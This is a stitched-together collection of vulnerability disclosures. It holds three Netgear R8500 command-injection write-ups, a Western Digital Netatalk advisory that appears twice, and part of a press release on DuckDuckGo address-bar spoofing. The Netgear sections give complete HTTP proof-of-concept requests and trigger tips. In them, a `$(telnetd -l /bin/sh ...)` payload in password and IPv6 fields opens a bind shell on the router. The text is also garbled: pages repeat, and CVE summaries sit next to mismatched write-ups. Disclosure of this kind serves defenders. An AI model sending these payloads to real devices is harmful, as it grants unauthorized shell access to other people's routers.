NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the sysNewPasswd and sysConfirmPasswd parameters to admin_account.cgi.

**Netgear R8500 Router Vulnerability****Basic infomation**

*   Vendor: Netgear
    
*   Product: R8500
    
*   Firmware version: V1.0.2.158
    
*   Firmware download link: https://www.downloads.netgear.com/files/GDC/R8500/R8500-V1.0.2.158\_1.0.105.zip
    
*   Type:Remote Command Execution
    
*   author:donothingme
    

**Vulnerability description**

We found a Command Injection vulnerability in Netgear R8500 router, which allows an authenticated attacker to execute arbitrary OS commands by a crafted request.

In set password page(http://www.routerlogin.net/genie\_admin\_account.htm), we can set new password.

The `sysNewPasswd` and `sysConfirmPasswd` fields have a command injection vulnerability. If we set the two fields equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+33333+-b+0.0.0.0%29`, we can actually execute command which `$(telnetd -l /bin/sh -p 33333-b 0.0.0.0)`.

![image-20220321151416068](https://github.com/donothingme/VUL/raw/main/vul3/3.assets/image-20220321151416068.png)

The POC like follows:

    POST /admin_account.cgi?id=7b1f57fc21e93455c9661ac4b027ee24b675c5cdbe2364d4783154751352f378 HTTP/1.1
    Host: 192.168.1.1
    Proxy-Connection: keep-alive
    Content-Length: 195
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.1/genie_admin_account.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=4125904923
    
    sysNewPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+33333+-b+0.0.0.0%29&sysConfirmPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+33333+-b+0.0.0.0%29&question1=1&answer1=test&question2=1&answer2=test&next=submit
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321143133027](https://github.com/donothingme/VUL/raw/main/vul3/3.assets/image-20220321143133027.png)

**Some tips to trigger vulnerability:**

*   Use IP address(192.168.1.1) instead of url(www.routerlogin.net) to access web page
*   Plug in the USB stick to make sure reproduce successfunly

**Firmware analysis**

We can locate the vulnerability function by string "admin\_account.cgi".

![image-20220321151509958](https://github.com/donothingme/VUL/raw/main/vul3/3.assets/image-20220321151509958.png)

In function `sub_72934`, the `sysNewPasswd` field is directly saved in nvram config, and this field is directly controlled by attackers.

![image-20220321151641996](https://github.com/donothingme/VUL/raw/main/vul3/3.assets/image-20220321151641996.png)

The nvram value `htt_passwd` is used in many functions, and some functions use this value to execute function `system()`, so it will cause a command injection vulnerability.

![image-20220321165427267](https://github.com/donothingme/VUL/raw/main/vul3/3.assets/image-20220321165427267.png)

CVE-2022-27946: VUL/3.md at main · donothingme/VUL

NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the sysNewPasswd and sysConfirmPasswd parameters to password.cgi.

**Netgear R8500 Router Vulnerability****Basic infomation**

*   Vendor: Netgear
    
*   Product: R8500
    
*   Firmware version: V1.0.2.158
    
*   Firmware download link: https://www.downloads.netgear.com/files/GDC/R8500/R8500-V1.0.2.158\_1.0.105.zip
    
*   Type:Remote Command Execution
    
*   author:donothingme
    

**Vulnerability description**

We found a Command Injection vulnerability in Netgear R8500 router, which allows an authenticated attacker to execute arbitrary OS commands by a crafted request.

In set password page(http://www.routerlogin.net/PWD\_password.htm), we can set new password.

The `sysNewPasswd` and `sysConfirmPasswd` fields have a command injection vulnerability. If we set the two fields equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29`, we can actually execute command which `$(telnetd -l /bin/sh -p 44444 -b 0.0.0.0)`.

![image-20220321145311536](https://github.com/donothingme/VUL/raw/main/vul2/2.assets/image-20220321145311536.png)

The POC like follows:

    POST /password.cgi?id=011b0b1ad47a66d6220c8cd546f41a553cafa50aaadb10fe3dd324af7225cf35 HTTP/1.1
    Host: www.routerlogin.net
    Proxy-Connection: keep-alive
    Content-Length: 425
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://www.routerlogin.net
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://www.routerlogin.net/PWD_password.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=1222440606
    
    buttonHit=cfAlert_Apply&buttonValue=%E5%BA%94%E7%94%A8&cfAlert_Apply=%E5%BA%94%E7%94%A8&sysOldPasswd=password&sysNewPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29&sysConfirmPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29&checkPassRec=1&question1=1&answer1=test&question2=1&answer2=test&timestamp_value=Mon+Mar+21+2022+09%3A41%3A08+GMT%2B0800+%28%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4%29
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321094402948](https://github.com/donothingme/VUL/raw/main/vul2/2.assets/image-20220321094402948.png)

**Some tips to trigger vulnerability:**

*   Use IP address(192.168.1.1) instead of url(www.routerlogin.net) to access web page
*   Plug in the USB stick to make sure reproduce successfunly

**Firmware analysis**

We can locate the vulnerability function by string "password.cgi".

![image-20220321143703221](https://github.com/donothingme/VUL/raw/main/vul2/2.assets/image-20220321143703221.png)

In function `sub_38944`, the `sysNewPasswd` field is directly saved in nvram config, and this field is directly controlled by attackers.

![image-20220321145040867](https://github.com/donothingme/VUL/raw/main/vul2/2.assets/image-20220321145040867.png)

The nvram value `htt_passwd` is used in many functions, and some functions use this value to execute function `system()`, so it will cause a command injection vulnerability.

![image-20220321145204145](https://github.com/donothingme/VUL/raw/main/vul2/2.assets/image-20220321145204145.png)

CVE-2022-27945: VUL/2.md at main · donothingme/VUL

NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameter.

**Netgear R8500 Router Vulnerability****Basic infomation**

*   Vendor: Netgear
    
*   Product: R8500
    
*   Firmware version: V1.0.2.158
    
*   Firmware download link: https://www.downloads.netgear.com/files/GDC/R8500/R8500-V1.0.2.158\_1.0.105.zip
    
*   Type:Remote Command Execution
    
*   author:donothingme
    

**Vulnerability description**

We found a Command Injection vulnerability in Netgear R8500 router, which allows an authenticated attacker to execute arbitrary OS commands by a crafted request.

In `http://www.routerlogin.net/IPV6_fixed.htm`, we can set a fixed ipv6 address.

In this page, there are 4 vulnerability points can trigger vulnerability. The reasons for the vulnerability are the same, so we only analyze one of them, and give 4 pocs to trigger vulnerability .

We can locate the vulnerability function by string "ipv6\_fix.cgi".

![image-20220321154257360](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321154257360.png)

In `/usr/bin/http` binary, the firmware save netword data to nvram.

In function `sub_9B10C`, the `ipv6_wan_ipaddr`/`ipv6_lan_ipaddr`/ `ipv6_wan_length`/`ipv6_lan_length`field is directly saved in nvram config, and this field is directly controlled by attackers.

![image-20220321154601683](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321154601683.png)

In `/sbin/acos_service` binary, the firmware extract network data from nvram. And these data is directly controlled by attackers.

In `sub_1F0C0`, `acosNvramConfig_get()` get data from nvram.

![image-20220321155054212](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321155054212.png)

In `sub_1D1AC`, firmware execute `system()` use the data of attacker, it will cause command injection vulnerability.

![image-20220321155143777](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321155143777.png)

**vulnerability point1**

**Some tips to trigger vulnerability:**

*   Use IP address(192.168.1.1) instead of url(www.routerlogin.net) to access web page
*   Plug in the USB stick to make sure reproduce successfunly

In `ipv6_wan_ipaddr` filed, if we set the filed equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+9999+-b+0.0.0.0%29`,we can actually execute command which `$(telnetd -l /bin/sh -p 9999-b 0.0.0.0)`.

The POC like follows:

    POST /ipv6_fix.cgi?id=a963685274e4a40fab8d712f1cc1f55f1f1a749a094a7ae1a06d9534db56ce3d HTTP/1.1
    Host: 192.168.1.1
    Proxy-Connection: keep-alive
    Content-Length: 1089
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.1/IPV6_fixed.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=1222440606
    
    apply=%E5%BA%94%E7%94%A8&login_type=%E9%9D%99%E6%80%81&IPv6WanAddr1=2001&IPv6WanAddr2=0000&IPv6WanAddr3=0000&IPv6WanAddr4=0000&IPv6WanAddr5=0000&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0000&ProfixWanLength=64&IPv6Gateway1=2001&IPv6Gateway2=0000&IPv6Gateway3=0000&IPv6Gateway4=0000&IPv6Gateway5=0000&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0001&DAddr1=2001&DAddr2=0000&DAddr3=0000&DAddr4=0000&DAddr5=0000&DAddr6=0000&DAddr7=0000&DAddr8=0002&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=2002&IPv6LanAddr2=0000&IPv6LanAddr3=0000&IPv6LanAddr4=0000&IPv6LanAddr5=0000&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=64&ipv6_wan_ipaddr=%24%28telnetd+-l+%2Fbin%2Fsh+-p+9999+-b+0.0.0.0%29&ipv6_lan_ipaddr=2002%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0001&ipv6_wan_length=64&ipv6_lan_length=64&ipv6_pri_dns=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0002&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0001&ipv6_enable_dhcp=&ipv6_proto=fixed
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321135622300](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321135622300.png)

**vulnerability point2**

In `ipv6_lan_ipaddr` filed, if we set the filed equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+10000+-b+0.0.0.0%29`,we can actually execute command which `$(telnetd -l /bin/sh -p 10000-b 0.0.0.0)`.

![image-20220321135927259](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321135927259.png)

The POC like follows:

    POST /ipv6_fix.cgi?id=14f6201985986f34fc5b9f88600e017cbf67d002b45a03f48ebb8b6396edc3f4 HTTP/1.1
    Host: 192.168.1.1
    Proxy-Connection: keep-alive
    Content-Length: 1066
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.1/IPV6_fixed.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=2558749239
    
    apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=0000&IPv6WanAddr3=0000&IPv6WanAddr4=0000&IPv6WanAddr5=0000&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0000&ProfixWanLength=64&IPv6Gateway1=2001&IPv6Gateway2=0000&IPv6Gateway3=0000&IPv6Gateway4=0000&IPv6Gateway5=0000&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0001&DAddr1=2001&DAddr2=0000&DAddr3=0000&DAddr4=0000&DAddr5=0000&DAddr6=0000&DAddr7=0000&DAddr8=0002&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=2002&IPv6LanAddr2=0000&IPv6LanAddr3=0000&IPv6LanAddr4=0000&IPv6LanAddr5=0000&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=64&ipv6_wan_ipaddr=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000&ipv6_lan_ipaddr=%24%28telnetd+-l+%2Fbin%2Fsh+-p+10000+-b+0.0.0.0%29&ipv6_wan_length=64&ipv6_lan_length=64&ipv6_pri_dns=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0002&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0001&ipv6_enable_dhcp=&ipv6_proto=fixed
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321140711686](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321140711686.png)

**vulnerability point3**

In `ipv6_wan_length` filed, if we set the filed equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+11111+-b+0.0.0.0%29`,we can actually execute command which `$(telnetd -l /bin/sh -p 11111-b 0.0.0.0)`.

![image-20220321141223903](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321141223903.png)

The POC like follows:

    POST /ipv6_fix.cgi?id=14f6201985986f34fc5b9f88600e017cbf67d002b45a03f48ebb8b6396edc3f4 HTTP/1.1
    Host: 192.168.1.1
    Proxy-Connection: keep-alive
    Content-Length: 1066
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.1/IPV6_fixed.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=2558749239
    
    apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=0000&IPv6WanAddr3=0000&IPv6WanAddr4=0000&IPv6WanAddr5=0000&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0000&ProfixWanLength=64&IPv6Gateway1=2001&IPv6Gateway2=0000&IPv6Gateway3=0000&IPv6Gateway4=0000&IPv6Gateway5=0000&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0001&DAddr1=2001&DAddr2=0000&DAddr3=0000&DAddr4=0000&DAddr5=0000&DAddr6=0000&DAddr7=0000&DAddr8=0002&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=2002&IPv6LanAddr2=0000&IPv6LanAddr3=0000&IPv6LanAddr4=0000&IPv6LanAddr5=0000&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0000&ProfixLanLength=64&ipv6_wan_ipaddr=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000&ipv6_lan_ipaddr=2002%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000&ipv6_wan_length=%24%28telnetd+-l+%2Fbin%2Fsh+-p+11111+-b+0.0.0.0%29&ipv6_lan_length=64&ipv6_pri_dns=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0002&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0001&ipv6_enable_dhcp=&ipv6_proto=fixed
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321141706848](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321141706848.png)

**vulnerability point4**

In `ipv6_lan_length` filed, if we set the filed equal to `%24%28telnetd+-l+%2Fbin%2Fsh+-p+22222+-b+0.0.0.0%29`,we can actually execute command which `$(telnetd -l /bin/sh -p 22222-b 0.0.0.0)`.

![image-20220321141804075](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321141804075.png)

The POC like follows:

    POST /ipv6_fix.cgi?id=211c9d0df6eb050404a90986a1f6b103d6f37b6a750dd1724caf349ff6393451 HTTP/1.1
    Host: 192.168.1.1
    Proxy-Connection: keep-alive
    Content-Length: 1064
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46cGFzc3dvcmQ=
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.1/IPV6_fixed.htm
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
    Cookie: XSRF_TOKEN=4125904923
    
    apply=%E5%BA%94%E7%94%A8&login_type=%E9%9D%99%E6%80%81&IPv6WanAddr1=2001&IPv6WanAddr2=0000&IPv6WanAddr3=0000&IPv6WanAddr4=0000&IPv6WanAddr5=0000&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0000&ProfixWanLength=64&IPv6Gateway1=2001&IPv6Gateway2=0000&IPv6Gateway3=0000&IPv6Gateway4=0000&IPv6Gateway5=0000&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=2001&DAddr2=0000&DAddr3=0000&DAddr4=0000&DAddr5=0000&DAddr6=0000&DAddr7=0000&DAddr8=0003&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=2002&IPv6LanAddr2=0000&IPv6LanAddr3=0000&IPv6LanAddr4=0000&IPv6LanAddr5=0000&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=64&ipv6_wan_ipaddr=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000&ipv6_lan_ipaddr=2002%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0001&ipv6_wan_length=64&ipv6_lan_length=%24%28telnetd+-l+%2Fbin%2Fsh+-p+22222+-b+0.0.0.0%29&ipv6_pri_dns=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0003&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=2001%3A0000%3A0000%3A0000%3A0000%3A0000%3A0000%3A0002&ipv6_enable_dhcp=&ipv6_proto=fixed
    

And as we can see, after send the craft request, the command is actually executed, and we can get a shell.

![image-20220321142518762](https://github.com/donothingme/VUL/raw/main/vul1/1.assets/image-20220321142518762.png)

CVE-2022-27947: VUL/1.md at main · donothingme/VUL

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**WDC Tracking Number:** WDC-22005  
**Published:** March 24, 2022

**Last Updated:** March 24, 2022

**Description**

Netatalk is an open-source Apple File Protocol fileserver that was being used by Western Digital products to access network shares and perform Time Machine backups. Multiple critical vulnerabilities have been discovered in Netatalk. Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022. Users can continue to access local network shares and perform Time Machine backup via SMB. For additional information, please refer to this KBA.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.19.117

January 10, 2022

My Cloud PR4100

5.19.117

January 10, 2022

My Cloud EX4100

5.19.117

January 10, 2022

My Cloud EX2 Ultra

5.19.117

January 10, 2022

My Cloud Mirror Gen 2

5.19.117

January 10, 2022

My Cloud DL2100

5.19.117

January 10, 2022

My Cloud DL4100

5.19.117

January 10, 2022

My Cloud EX2100

5.19.117

January 10, 2022

My Cloud

5.19.117

January 10, 2022

WD Cloud

5.19.117

January 10, 2022

My Cloud Home

7.16-220

January 10, 2022

**Advisory Summary**

A stack-based buffer overflow vulnerability was discovered within the ad\_addcomment function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-0194

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

An improper handling of exceptional conditions issue was found in the parse\_entries function that did not properly handle parsing AppleDouble entries. This vulnerability could allow a remote attacker to carry out an unauthenticated remote command execution on affected versions of Netatalk.

**CVE Number:** CVE-2022-23121

**Reporteb By:** NCC Group EDG (Alex Plaskett, Cedric Halbronn, Aaron Adams) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the setfilparams function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23122

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the getdirparams method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23123

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the get\_finderinfo method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23124

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the copyapplfile function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23125

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**CVE Number:** CVE-2022-22995

**Reported By:** Corentin BAYET (@OnlyTheDuck), Etienne HELLUY-LAFONT and Luca MORO (@johncool\_\_) from Synacktiv working with Trend Micro’s Zero Day Initiative

*      
    
    {{ skuObj.title.length < 15 ? skuObj.title : skuObj.title.substring(0,14) + "..." }}

CVE-2022-22995: WDC-22005 Netatalk Security Vulnerabilities | Western Digital

**WDC Tracking Number:** WDC-22005  
**Published:** March 24, 2022

**Last Updated:** March 24, 2022

**Description**

Netatalk is an open-source Apple File Protocol fileserver that was being used by Western Digital products to access network shares and perform Time Machine backups. Multiple critical vulnerabilities have been discovered in Netatalk. Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022. Users can continue to access local network shares and perform Time Machine backup via SMB. For additional information, please refer to this KBA.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.19.117

January 10, 2022

My Cloud PR4100

5.19.117

January 10, 2022

My Cloud EX4100

5.19.117

January 10, 2022

My Cloud EX2 Ultra

5.19.117

January 10, 2022

My Cloud Mirror Gen 2

5.19.117

January 10, 2022

My Cloud DL2100

5.19.117

January 10, 2022

My Cloud DL4100

5.19.117

January 10, 2022

My Cloud EX2100

5.19.117

January 10, 2022

My Cloud

5.19.117

January 10, 2022

WD Cloud

5.19.117

January 10, 2022

My Cloud Home

7.16-220

January 10, 2022

**Advisory Summary**

A stack-based buffer overflow vulnerability was discovered within the ad\_addcomment function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-0194

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

An improper handling of exceptional conditions issue was found in the parse\_entries function that did not properly handle parsing AppleDouble entries. This vulnerability could allow a remote attacker to carry out an unauthenticated remote command execution on affected versions of Netatalk.

**CVE Number:** CVE-2022-23121

**Reporteb By:** NCC Group EDG (Alex Plaskett, Cedric Halbronn, Aaron Adams) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the setfilparams function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23122

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the getdirparams method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23123

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the get\_finderinfo method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23124

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the copyapplfile function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23125

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**CVE Number:** CVE-2022-22995

**Reported By:** Corentin BAYET (@OnlyTheDuck), Etienne HELLUY-LAFONT and Luca MORO (@johncool\_\_) from Synacktiv working with Trend Micro’s Zero Day Initiative

The DuckDuckGo browser 7.64.4 on iOS allows Address Bar Spoofing due to mishandling of the JavaScript window.open function (used to open a secondary browser window). This could be exploited by tricking users into supplying sensitive information such as credentials, because the address bar would display a legitimate URL, but content would be hosted on the attacker's web site.

Press Releases | 8 February 2022

******New address bar vulnerabilities found in DuckDuckGo and Tap Browser, disclosed by Cyber Citadel researchers, could affect millions of iOS and Android users******

Cyber Citadel’s Lead Security Researcher Rafay Baloch and Security Researcher Muhammad Samak disclosed address bar spoofing vulnerabilities today in the DuckDuckGo browser for iOS, Video Downloader Browser for Android and Tap Browser for iOS mobile web browser applications

These flaws can be exploited, by potentially tricking users into supplying sensitive information to a malicious website. Our discovery found that a malicious attacker could easily lead the unsuspecting users to believe that they are visiting a legitimate website as the address bar points to the correct website. It is pertinent to mention here that, Cyber Citadel, as a part of its responsible disclosure policy gave a time frame of 60 days to all three browsers to fix these vulnerabilities. At the time of publishing this disclosure, the issue was only addressed by DuckDuckGo.

****Address Bar Spoofing Vulnerabili**es**

Mobile web browser address bar spoofing allows an attacker to change the URL of a malicious website to one that represents a legitimate website i.e. google.com, bing.com, facebook.com, or apple.com, for example.

This vulnerability bypasses the security certificates built into most modern mobile address bars. Desktop web browsers designate a website as safe by the lock icon on the far left of an address bar that ‘guarantees’ a website has a valid SSL certificate and is, therefore, secure.

On the other hand, security indicators on mobile devices are harder to find, due to the lack of screen real-estate, and restrict the ability to interrogate security elements. With typical users being unaware of website validation on mobile web browsers, cybercriminals are free to insert fake malicious pages with spoofed URL addresses.

